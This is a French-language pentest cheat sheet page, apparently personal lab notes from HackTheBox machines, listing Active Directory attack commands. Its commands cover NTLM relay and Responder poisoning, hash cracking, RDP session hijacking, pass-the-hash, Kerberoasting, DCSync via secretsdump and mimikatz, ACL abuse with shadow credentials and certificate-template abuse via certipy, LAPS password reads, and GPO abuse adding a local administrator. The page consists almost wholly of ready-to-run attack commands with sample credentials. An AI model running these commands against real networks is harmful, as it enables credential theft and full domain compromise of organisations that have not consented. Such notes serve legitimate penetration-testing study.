Exploitation

NTLMReplay

cat /etc/responder/Responder.conf | grep 'SMB ='
# SMB = off

impacket-ntlmrelayx --no-http-server -smb2support -t <machine_ip> -c >CMD>
impacket-ntlmrelayx --no-http-server -smb2support -t <machine_ip>

Vole NTLM

sudo responder -I tun0
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

mssql> EXEC master..xp_dirtree '\\10.10.15.193\share\'

Détournement de session

# Disposer droit système
C:\> query user
C:\> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
C:\> net start sessionhijack

Pass-The-Hash

# Autoriser à ce que l'administrator puisse se connecter avec le hash
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

xfreerdp /v:10.129.203.13 /u:administrator /pth:'0E14B9D6330BF16C30B1924111104824'
evil-winrm -i <machine_ip> -u user -pth '0E14B9D6330BF16C30B1924111104824'

LLMNR/NBT-NS Poisoning

Import-Module .\Inveigh.ps1
(Get-Command Invoke-Inveigh).Parameters
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

.\Inveigh.exe

sudo responder -I tun0

GPOAbuse

Enumération

Import-Module ./powerview.ps1
Get-NetGPO | select displayname
Get-GPO -Name "Default Domain Policy"
Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName <user>

.\SharpView.exe Get-DomainGPO -Properties displayName
.\SharpView.exe Get-DomainGPO -UserIdentity snovvcrash -Properties DisplayName
.\SharpView.exe Get-DomainGPO -UserIdentity snovvcrash -Properties DisplayName

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount secura\charlotte --GPOName "Default Domain Policy" --force

gpupdate /force
gpupdate /target:user /force

Kerberoasting

Linux

impacket-GetNPUsers -dc-ip <machine_ip> domain.local/ -usersfile ~/user.txt -format hashcat -outputfile hash.txt
impacket-GetNPUsers domain/user:password -request -format hashcat -outputfile hash.txt

impacket-GetUserSPNs domain.local/svc_tgs:pasword123 -dc-ip <machine_ip>  -request

Si problème horloge :

sudo ntpdate 10.10.11.41

Windows

./Rubeus.exe kerberoast /outfile:hash.txt
./Rubeus.exe asreproast /outfile:hash.txt

ACL

DCSync

Linux

impacket-secretsdump 'administrator.htb'/'ethan':'limpbizkit'@'10.10.11.42'

Windows

mimikatz.exe "privilege::debug" "lsadump::sam"

WriteOwner

Linux

# rendre l'utilisateur propriétaire
python owneredit.py -action write -new-owner 'judith.mader' -target 'management' 'certified/judith.mader':'judith09' -dc-ip box_ip

# donner les droits en écritures
python dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=Management,CN=Users,DC=certified,DC=htb' 'certified'/'judith.mader':'judith09' -dc-ip 10.10.11.41

# ajouter un membre au groupe
net rpc group addmem "Management" "judith.mader" -U "certified"/"judith.mader"%"judith09" -S "10.10.11.41"

# Vérifier
net rpc group members "Management" -U "certified"/"judith.mader"%"judith09" -S "10.10.11.41"

GenericWrite

Linux

# Kerberoast
python targetedKerberoast.py -v -d 'certified.htb' -u 'judith.mader' -p 'judith09'

# Shadow Credentials attack -- Récupérer le hash NT
certipy-ad shadow auto -u judith.mader@certified.htb -dc-ip 10.10.11.41 -target DC01.certified.htb -account management_svc

GenericAll

Linux

# Changer mot de passe
net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

# Même chose mais avec hash (utiliser deux NT fonctionne)
pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"

# Modifier l'UPN
certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator

# Récupérer le certificat
certipy-ad req -username ca_operator@certified.htb -p newP@ssword2022 -ca certified-DC01-CA -template CertifiedAuthentication -dc-ip 10.10.11.41

# Revenir à l'UPN initial
certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb

# Récupérer le hash
certipy-ad auth -pfx administrator.pfx -domain certified.htb -dc-ip 10.10.11.41

ReadLAPSPassword

Linux

pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"

Windows

https://github.com/ztrhgf/LAPS/tree/master/AdmPwd.PS

upload AdmPwd.PS
Import-Module ./AdmPwd.PS.psd1
get-admpwdpassword -computername dc01 | Select password

ForceChangePassword

AddKeyCredentialLink

pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"

Certificat Authority

.\Certify.exe cas
.\Certify.exe find /vulnerable

certipy-ad req -u ryan.test@local.htb -p password -upn administrator@local.htb
-target local.htb -ca local-dc-ca -template UserAuthentication

# Eventuellement
sudo ntpdate -u 10.10.10.10

certipy-ad auth -pfx administrator.pfx

PrécédentEnumération Suivant04. Web

Mis à jour il y a 1 an

hashtagNTLMReplay

hashtagVole NTLM

hashtagDétournement de session

hashtagPass-The-Hash

hashtagLLMNR/NBT-NS Poisoning

hashtagGPOAbuse

hashtagEnumération

hashtagKerberoasting

hashtagLinux

hashtagWindows

hashtagACL

hashtagDCSync

hashtagLinux

hashtagWindows

hashtagWriteOwner

hashtagLinux

hashtagGenericWrite

hashtagLinux

hashtagGenericAll

hashtagLinux

hashtagReadLAPSPassword

hashtagLinux

hashtagWindows

hashtagForceChangePassword

hashtagAddKeyCredentialLink

hashtagCertificat Authority

NTLMReplay

Vole NTLM

Détournement de session

Pass-The-Hash

LLMNR/NBT-NS Poisoning

GPOAbuse

Enumération

Kerberoasting

Linux

Windows

ACL

DCSync

Linux

Windows

WriteOwner

Linux

GenericWrite

Linux

GenericAll

Linux

ReadLAPSPassword

Linux

Windows

ForceChangePassword

AddKeyCredentialLink

Certificat Authority